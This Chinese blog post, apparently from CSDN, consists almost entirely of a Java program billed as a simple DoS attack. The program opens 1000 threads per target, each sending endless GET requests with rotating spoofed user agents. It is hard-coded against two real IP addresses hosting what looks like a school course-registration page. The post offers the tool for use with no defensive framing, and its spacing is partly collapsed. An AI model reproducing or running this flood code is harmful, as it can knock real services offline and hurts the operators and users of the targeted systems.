python实现dos攻击_Java实现简单的DoS攻击

packagedos;importjava.net.HttpURLConnection;importjava.net.URL;importjava.net.URLConnection;importjava.util.ArrayList;importjava.util.Random;importjava.util.concurrent.ExecutorService;importjava.util.concurrent.Executors;/*** DoS攻击

*

*@authorQ

**/

public classTest {/*** 输入开启的线程数量*/

private static final int MAX_THREAD = 1000;/*** 输入你想攻击的网址*/

private static final String URL1 = "http://202.206.208.35:7777/zhxt_bks/zhxt_bks.html";private static final String URL2 = "http://202.206.208.84:7777/zhxt_bks/zhxt_bks.html";private static ArrayListuserAgentsList;public static voidmain(String[] args) {

userAgentsList= new ArrayList();

InsertUserAgent();

Attack(URL1);

Attack(URL2);

}/*** Get请求攻击*/

private static voidAttack(String URL) {

ExecutorService ex=Executors.newFixedThreadPool(MAX_THREAD);for (int i = 0; i < MAX_THREAD; i++) {

ex.execute(newThread() {

@Overridepublic voidrun() {while (true) {

sendGet(URL);

}

}

});

}

}private static voidsendGet(String URL) {try{

URL url= newURL(URL);

URLConnection connection=url.openConnection();

HttpURLConnection httpURLConnection=(HttpURLConnection) connection;

httpURLConnection.setRequestMethod("GET");

httpURLConnection.setRequestProperty("Connection", "keep-alive");

httpURLConnection.setRequestProperty("Cache-Control", "max-age=0");

httpURLConnection.setRequestProperty("Upgrade-Insecure-Requests", "1");

httpURLConnection.setRequestProperty("Accept-Charset", "zh-CN,zh;q=0.9");

httpURLConnection.setRequestProperty("Content-Type", "application/text");

httpURLConnection.setRequestProperty("User-Agent", selectUserAgent());

httpURLConnection.connect();int code =httpURLConnection.getResponseCode();if (httpURLConnection.getResponseCode() >= 300) {throw new Exception("Request is not success, Response code is " +code);

}else{

System.out.println("Request is success, Response code is " +code);

}

}catch(Exception e) {

}

}private staticString selectUserAgent() {

Random random= newRandom();int i =random.nextInt(userAgentsList.size());returnuserAgentsList.get(i);

}private static voidInsertUserAgent() {

userAgentsList

.add("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95");

userAgentsList.add("Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.50");

userAgentsList.add("Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10");

userAgentsList

.add("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7");

userAgentsList

.add("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71");

userAgentsList.add("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko)");

userAgentsList

.add("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101");

userAgentsList

.add("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71");

userAgentsList

.add("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)");

userAgentsList.add("Mozilla/5.0 (Linux; U; Android 2.2.1; zh-cn; HTC_Wildfire_A3333 Build/FRG83D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1");

userAgentsList.add("Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10");

userAgentsList.add("Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.0; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/233.70 Safari/534.6 TouchPad/1.0");

userAgentsList

.add("Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; HTC; Titan)");

userAgentsList.add("Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5");

userAgentsList.add("AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1");

}

}

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值